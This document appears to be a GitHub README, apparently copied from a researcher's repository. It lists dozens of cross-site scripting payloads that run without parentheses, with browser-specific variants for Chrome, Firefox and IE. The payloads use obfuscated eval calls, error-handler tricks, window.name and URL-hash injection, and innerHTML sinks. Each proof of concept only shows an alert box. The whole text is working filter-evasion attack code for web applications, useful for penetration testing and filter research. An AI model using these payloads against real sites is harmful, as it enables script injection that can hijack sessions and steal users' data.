XSS-Payloads
XSS Without parentheses ()
This repo contains XSS payloads that doesn't require parentheses, collected from tweets, blogs...
All the POC's are alert box with number 23
alert`23`
window.name="javascript:alert(23)";
location="xss.html";
xss.html
location=name
eval.call`${'alert\x2823\x29'}`
eval.apply`${[`alert\x2823\x29`]}`
setTimeout`alert\x2823\x29`
setInterval`alert\x2823\x29`
onerror=alert;throw 23;
'alert\x2823\x29'instanceof{[Symbol.hasInstance]:eval}
Only Chrome Garethheyes
onerror=eval;throw'=alert\x2823\x29';
{onerror=alert}throw 23
[][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]]`$${[!{}+[]][+[]][+!+[]]+[!{}+[]][+[]][+!+[]+!+[]]+[!{}+[]][+[]][+!+[]+!+[]+!+[]+!+[]]+[!![]+[]][+[]][+!+[]]+[!![]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]}$```//Function(alert(1))
xss_redir.html
window.name='1;var Uncaught=1;alert(23)';
location='xss_short.html';
xss_short.html
{onerror=eval}throw/0/+name
example.com/#1/-alert(23)/
onhashchange=setTimeout;
Object.prototype.toString=RegExp.prototype.toString;
Object.prototype.source=location.hash;
location.hash=null;
throw/a/,Uncaught=1,g=alert,a=g+0,onerror=eval,/1/g+a[14]+[23,331,337]+a[15]
window.name="alert(23)";
location="xss.html";
xss.html
Function`a${name}```
Put %0aalert(/23/)//
anywhere in the URL
location='javascript:'+location
location=/javascript:/.source+location
location=`javascript:`+location
x={...eval+0,toString:Array.prototype.shift,length:15},
x+x+x+x+x+x+x+x+x+x+x+x+x,
location = /javascript:/.source + alert.name+x+23+x
example.com/xss?%0aalert(/23/)//
Function`a${unescape. call`${location}`}```
onhashchange=setTimeout;
HashChangeEvent.prototype.toString=
RegExp.prototype.toString;
location.hash=
HashChangeEvent.prototype.source=
'1/-alert\5023\51/';
onload=setTimeout
Event.prototype.toString=
_=>"alert\5023\51"
throw/**/Uncaught=window.onerror=eval,";alert\5023\51"
x=new DOMMatrix;
matrix=alert;
x.a=23;
location='javascript'+':'+x
Function`a${`alert${Function`a${`return fromCharCode`}{fromCharCode}``${String}``40`}23${Function`a${`return fromCharCode`}{fromCharCode}``${String}``41`}`}```
range = document.createRange``;
range.createContextualFragment`<img src=x onerror=alert\x2823\x29>'`;
Function`a${`${Function`a${`return from`}{from}``${Array}``96${Function`a${`return fromCharCode`}{fromCharCode}``${String}`}`}${Function`a${`return fromCharCode`}{fromCharCode}``${String}``${96}${10}${97}${108}${101}${114}${116}${40}${50}${51}${41}`}`}```
window.name="alert(23)"
location="xss.html"
xss.html
eval.constructor`eval\x28name\x29```
window.name="alert(23)"
location="xss.html"
xss.html
[].every.call`eval\x28name\x29${eval}`
[]["filter"]["constructor"]`alert\x2823\x29```
Array.prototype[Symbol.hasInstance]=eval;
"alert\x2823\x29" instanceof [];
x='javascript:alert\x2823\x29';x={x:location}=this
window.name="alert(23)"
location="xss.html"
xss.html
eval.call`${top.name}`
window.name="<img src=x onerror=alert(23)>"
location="xss.html"
xss.html
document.write`${top.name}`
location="https://example.com/xss.html/.source;alert(23)?xss="
example.com
eval.call`${location.pathname}`
Only Firefox Garethheyes
{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:'',message:'alert\x2823\x29'}
example.com/xss#*/;alert(23);
throw/**/onerror=Uncaught=eval,e={lineNumber:1,columnNumber:1,fileName:'',message:'/*'+location.hash},typeof/**/InstallTrigger!='undefined'?e:e.message
https://demo.vwzq.net/lol.html
<script/id=Uncaught>
// chrome + firefox
throw[onerror=eval][e=[x='+alert\x2823\x29']]=0[e.lineNumber=e.columnNumber=e.fileName=e.message=x]=e
</script>
<script>
// firefox
onhashchange=setTimeout,HashChangeEvent.prototype[Symbol.toStringTag]='+alert\x2823\x29',location.hash=1
</script>
<script>
// chrome + firefox
Array.prototype[Symbol.hasInstance]=eval,'alert\x2823\x29'instanceof[]
</script>
<script>
// chrome
[onerror=eval][TypeError.prototype.name='=/']['/-alert\x2823\x29//']
</script>
<script>
// chrome
onerror=eval,ReferenceError.prototype.name='=alert\x2823\x29//',lol
</script>
document.body.innerHTML="\u003cimg src=x onerror=alert\u002823\u0029\u003e";
document.body.innerHTML="<img src=x onerror=alert(23)>"
document.body.innerHTML=document.body.innerText
If the page is frameable Renwa
data:text/html,<iframe name="<svg/onload=alert(23)>" src="http://example.com/xss?document.body.innerHTML=name">
document.location='javascript:alert%2823%29'
Only IE matt
example.com/xss#<img src=x onerror=alert(23)>
document.body.innerHTML=location.hash;
<svg/onload='alert( 23 )'>
location=/javascript:alert%2823%29/.source;
http://example.com/?test=<img/src="x"/onerror=alert(23)>
document.body.innerHTML=location.search;
document.body.innerHTML=document.body.innerText;
Anything: @RenwaX23
来源:
https://github.com/RenwaX23/XSS-Payloads/edit/master/Without-Parentheses.md
逆水行舟,不进则退。